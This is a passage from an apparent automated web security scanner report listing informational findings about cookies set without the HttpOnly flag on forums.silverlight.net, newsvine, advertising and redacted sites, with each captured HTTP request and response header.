Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fyifung.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:07 GMT; expires=Sun, 29-Jan-2012 23:17:07 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:07 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fyifung.aspx
...[SNIP]...

17.262. http://forums.silverlight.net/search/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /search/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/ HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 23207
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:21:00 GMT; expires=Sun, 29-Jan-2012 23:21:00 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:41:00 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Search
...[SNIP]...

17.263. http://forums.silverlight.net/user/profile.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /user/profile.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/profile.aspx?UserID=96252 HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 249
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fuser%2fprofile.aspx%3fUserID%3d96252
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:20 GMT; expires=Sun, 29-Jan-2012 23:17:20 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:20 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fuser%2fprofile.aspx%3
...[SNIP]...

17.264. http://forums.silverlight.net/user/viewonline.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /user/viewonline.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /user/viewonline.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 278417
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:19 GMT; expires=Sun, 29-Jan-2012 23:17:19 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:19 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Who's
...[SNIP]...

17.265. http://health.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://health.redacted
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: health.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:55 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA19
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=1133fe74be594c568a34ac6ad24cff7a; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=CE873C51A3AB43DBA17ADCF0FD9904FA; domain=.redacted; expires=Wed, 17-Aug-2011 23:46:55 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 36431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://
...[SNIP]...

17.266. http://helenaspopkin.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://helenaspopkin.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: helenaspopkin.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:07:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=4166254bf39fbdb2b2c04df95de6c650; expires=Sat, 25-Jan-2031 02:07:18 GMT; path=/; domain=.newsvine.com
Content-Length: 0
Content-Type: text/html
Connection: close


17.267. http://ingame.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ingame.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: ingame.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 02:07:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=2f27a7911e836626553146fb369daabe; expires=Sat, 25-Jan-2031 02:07:24 GMT; path=/; domain=.newsvine.com
Location: http://ingame.msnbc.msn.com/
Content-Length: 2
Content-Type: text/html
Connection: close



17.268. http://js.revsci.net/gateway/gw.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=A06546 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv39SEJaSpn5l6paNmEWEzMqFRxKmlqLQZYxUOmG8ggolbMMvPsEEvJzkvhsvqTqAgDHJSkCRJECssiC+uNc0HvGBEwWMU1I/WZp2twauhl2HLuWCqVcMdoFzqPRdkboPy/4hudEhz+lsYyXiLltBm23RQ5kkhyU1jd7+S5iLCbslvM7XhfdRXs/LcG1fY/mxKKCC0YXfoQZJn9VDb2LOYFtxYmAZ6ztXcixPWz2RHsR7YVvcyJy858LTleiKLWa6VJtWUnlW1R5cEOxOVzVEPDU5JDm5FBb/PdzodlGGdSLImCnc30q3bosBAe1rCEoDlx9lkC0Z86u/7DXZA8OxpdIIZq3fm2x/Y1L/Fk6ubpQHq4yX+o7EgD8uvlSgO0rKW6DQpHvr05vHctOQCNhqTN9KtSovoK3V2XolIf+t+j8Fgr3oGrPvVMMOE+TtGi0T9GoqUGUdysI1D4HKgX2AeugvReG9yoU1WsCd96QJueeSZ9JW/hOoDAWQkWkL8cOSyJzSWMwamURPqLx+BisksqWdC/eBRvw9pXjNGRC6A2mTvF4qXnGgQTM3xjSifI+qX3GIcEGehR/kx+tOqDogRTs9TB3AAxoEuG0odnEy+DqPk52zTRte34chLZbeljSNuNAYgQnoBq4CvXsYfxEduAIt752bikdcyuIhj3DpogvW1pIzCZj7OIswr7Kn7ocfRjdAoL5T2uac/PT2Ydxc3xjy0HLBJPLbaN5HHHjdZ/T93Y0699FKXSmLQGIKZG/2yo8JITGL6MRcrdgyiTv35BCJuq368OVvIprsvvBAzlr2f4A8D5vhA7ZWI3sz30r2/s6dMS4r6GrFsgTbGEW11NGX8Jde7gdHMZiA7tQ9gNCNGwqql7QhJhTPnfqdBL+a2OE4iEDwzU5HcmCK3Y398/UWNtb+6WFgOQug8K08j5l7wrXjl372x2NFfJHBb4XQY7FFmKtDqZxGIB2GKfviK0+/3YJMKFhYlyBNuG+/5lbR1s04q8+Vl/Snxxyvwgdyv/F6uu8Sx/ED5jwkHGxKhrSD7I+9k9V2kKInbD9r9ClYHVTZvO/d9h1bs3b+wi7zbYw7cytf6R7E4UYzc9gAwi7K93pOLo9Dhkqxh8fi6awKRNuxkffO86mJh7RL+xQWFDJ8oDSPJa7pHSjDWcxrpbo+K5ZLrxrnxb78GjhpHYUxyZgCjjTpyHGwkX4vxoS3HpwxFkdG6F6w==; Domain=.revsci.net; Expires=Mon, 30-Jan-2012 01:29:41 GMT; Path=/
Last-Modified: Sun, 30 Jan 2011 01:29:41 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 31 Jan 2011 01:29:41 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Sun, 30 Jan 2011 01:29:41 GMT
Content-Length: 5639

//Vermont-12.4.0-1012
var rsi_now= new Date();
var rsi_csid= 'A06546';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){this._rsiaa=Da;this._rsiba
...[SNIP]...

17.269. http://latino.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://latino.redacted
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: latino.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:08 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA48
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3b8b0f18a4fc473bb2a2901d1486ffca; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
Set-Cookie: mh=MSFT; domain=.redacted; expires=Mon, 28-Jan-2013 23:47:08 GMT; path=/
Set-Cookie: CC=US; domain=.redacted; expires=Mon, 28-Jan-2013 23:47:08 GMT; path=/
Set-Cookie: hpsvr=D:blu|W:F|P:W; domain=.latino.redacted; expires=Sun, 01-Jan-2017 08:00:00 GMT; path=/
Set-Cookie: hpcli=0|W.1.1; domain=.latino.redacted; expires=Sun, 01-Jan-2017 08:00:00 GMT; path=/
Set-Cookie: hpwea=wc:USNY0996; domain=.latino.redacted; expires=Sun, 01-Jan-2017 08:00:00 GMT; path=/
Set-Cookie: FlightGroupId=74; domain=latino.redacted; expires=Mon, 28-Jan-2013 23:47:08 GMT; path=/
Set-Cookie: FlightId=BasePage; domain=latino.redacted; expires=Mon, 28-Jan-2013 23:47:08 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 72919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="es-us" lang="es-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

17.270. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=merchant_cs=1&betq=11325=420981 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.merchantcircle.com/corporate/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; BASE=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!; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 17:21:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=k4ZRNJpwIg02F1BCdbdRdgwUwXUHI8Y4F1BCYTeRdgQ3gZUHIQTnG1BCF2pRdgAohXUHIYZ4F1BCKGeRdgwohXUHIca4F1BCiGeRdgQshXUHwOIAM/oB0L7YCwAoGuxr1RQcKaYAGK2AI9YB7M53EkL3FJwgPXw6TVkJsuWB/0mxzfa7GIaWGDdrMaw41Zg3kq1B6bjxdp6bDwWZGu3r4fQsMaM+wa3BW8ox43I9HsfzFp/sNiQQoaUHs2DC1xmBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 17:21:40 GMT; path=/
Set-Cookie: GUID=MTI5NjQwODEwMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; domain=advertising.com; expires=Tue, 29-Jan-2013 17:21:40 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sun, 30 Jan 2011 18:21:40 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

17.271. http://lifestyle.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:11 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA08
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=95617ed8b1e0449b8e93c4352fb8c4ef; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=F82F814B9CA14A8DA8EF5EB7228D86A7; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:11 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 31456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="
...[SNIP]...

17.272. http://lifestyle.redacted/relationships/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /relationships/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /relationships/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:17 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA09
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ad185c8cd036476ab99f219f50cae67f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=4ACBAFEABC3E458D93445CB0BF71AA56; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:17 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 37451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="
...[SNIP]...

17.273. http://lifestyle.redacted/relationships/staticslideshowglamour.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /relationships/staticslideshowglamour.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /relationships/staticslideshowglamour.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA13
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3a0a17b7e3454f56a4bcc12d1023d4df; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=02D6064FB59C4177880821E6DA25C485; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:19 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.274. http://lifestyle.redacted/your-home/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-home/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-home/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA10
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a62fddde6fef43f48d53312bf038943f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=DE365542A27E43F9A2D20EEC313CB20E; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:26 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="
...[SNIP]...

17.275. http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-home/room-design/staticslideshowhb.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-home/room-design/staticslideshowhb.aspx?cp-documentid=26867784&gt1=32067 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:29 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA13
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=2d389eb7e7ea4ae0a473db58b1a5758b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=42164453E4924CB89C5B977561EA27D0; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 37466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.276. http://lifestyle.redacted/your-life/family-parenting/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-life/family-parenting/article.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-life/family-parenting/article.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 29 Jan 2011 23:47:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA12
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: http://lifestyle.redacted/your-life/family-parenting/default.aspx
Set-Cookie: MC1=V=3&GUID=e5a2e16a67154266a9d498fd513a08c5; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=2588A011AE014923A2AA5BE79447364F; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:25 GMT; path=/
Cache-Control: no-cache
Content-Length: 0


17.277. http://lifestyle.redacted/your-life/new-year-new-you/video.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-life/new-year-new-you/video.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-life/new-year-new-you/video.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:25 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA12
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a1ed2a58c8c240e8aa192c9ab451625e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
